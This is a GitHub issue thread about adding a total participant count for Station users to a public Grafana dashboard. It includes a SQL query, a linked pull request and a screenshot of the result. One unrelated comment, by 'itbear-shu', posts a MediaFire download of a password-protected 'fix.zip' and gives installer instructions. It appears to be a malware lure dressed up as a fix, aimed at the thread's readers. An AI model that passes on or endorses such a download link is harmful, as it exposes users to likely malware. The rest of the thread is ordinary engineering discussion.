### ISSUE TITLE
Show total number of participants (Station users)

### ISSUE THREAD

**Issue by bajtos** [space-meridian/roadmap#154]
https://space-meridian.slack.com/archives/C07E0B56RKN/p1724177583985949

> It would also be cool on the station website and dash to have the total number of FIL addresses to have ever submitted a measurement i.e. total user count

This should be very easy to implement:
- We already have daily_participants table, the data is exposed via “daily active participants” and “monthly active participants” endpoints. 
- We can add another endpoint to expose the number of distinct participants over the entire history.

```sql
SELECT COUNT(DISTINCT participant_id) FROM daily_participants;
```

Count: 43,533
Query duration: 415ms

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by juliangruber** [comment]
@patrickwoodhead where do we best surface this information?

**Comment by bajtos** [comment]
Let's add it to our Public Station Dashboard: https://grafana.filstation.app/public-dashboards/2751d44f96914bb3a030b1de13224d19?orgId=1

**Comment by juliangruber** [comment]
TODO:

- [x] Add expose this over time https://github.com/filecoin-station/spark-stats/pull/267

**Comment by juliangruber** [comment]
https://stackoverflow.com/questions/37917523/postgres-select-distinct-based-on-timestamp

**Comment by juliangruber** [comment]
Added to the station dashboard as a total number:

<img width="733" alt="Screenshot 2024-12-05 at 13 58 30" src="https://github.com/user-attachments/assets/75b554bb-6715-472a-b426-72ce125c2311">

**Comment by juliangruber** [comment]
https://grafana.filstation.app/public-dashboards/2751d44f96914bb3a030b1de13224d19?orgId=1
